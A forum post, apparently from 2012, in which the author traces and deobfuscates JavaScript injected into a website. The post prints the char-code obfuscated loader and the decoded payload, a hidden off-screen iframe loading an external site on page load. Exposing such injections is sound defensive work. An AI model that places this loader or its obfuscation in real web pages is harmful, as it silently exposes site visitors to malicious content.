With the first bit, the try statement - it's code designed to fail, so the catch blocks steps in and sets x = 2.
After I pasted the code, there appeared to be two commas missing from between elements in the array - either that or 2 numbers were broken in half. So I'm still not sure that I've guessed correctly.
After some mind-numbing tracing, I got to a situation where the s in the e(s) statement is equal to:
"
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999e
(9ggsk/tpd!>! iurq;-0msoed.dpfbrjpl/ec0n_jo,qin#<jdsn,je>!%gskJe%<epavncou,cpbz/_qqcoeAijje)ggsk*<~9ujobpx,poj
`c"<hqlCcc="
Which looks like junk to me, so I'll try again to paste the array correctly.
Wouldn't you just love to throttle the sod that did this..
EDIT: Had another try - I had inserted extra commas the first time round - this was clearly wrong. This time I removed the spaces, wrapped it into a funtion and removed the final eval, outputting instead to the console. Here's the re-written code and the final payload. Enjoy!
function injectedCrap()
{
try{1-prototype;}catch(asd){x=2;}
if(x)
{
fr="fromChar";
f=[ 4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,
29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,
90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,
97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,
3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,
94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,
50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,
102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,
37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,
90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,
23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,
92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94,
101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,
98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,
101,89,112,36,86,103,102,90,101,90,56,95,95,97,91,30,94,
93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,
102,100,97,102,87,89,23,51,21,93,104,98,56,90,89,50,3,-1 ];
v="eva";
}
if(v)
e=window[v+"l"];
w=f;
s=[];
r=String;
z=((e)?"Code":"");
zx=fr+z;
for(i=0;288-5+5-i>0;i+=1)
{
j=i;
if(e)
s=s+r[zx]((w[j]*1+(9+e("j%3"))));
}
console.log(s);
}
Which, when all is done and dusted evaluates to this nasty piece of work:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://lundf-creation.de/main.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
Dirty elephanters!
modified 30-Jul-12 7:59am.
|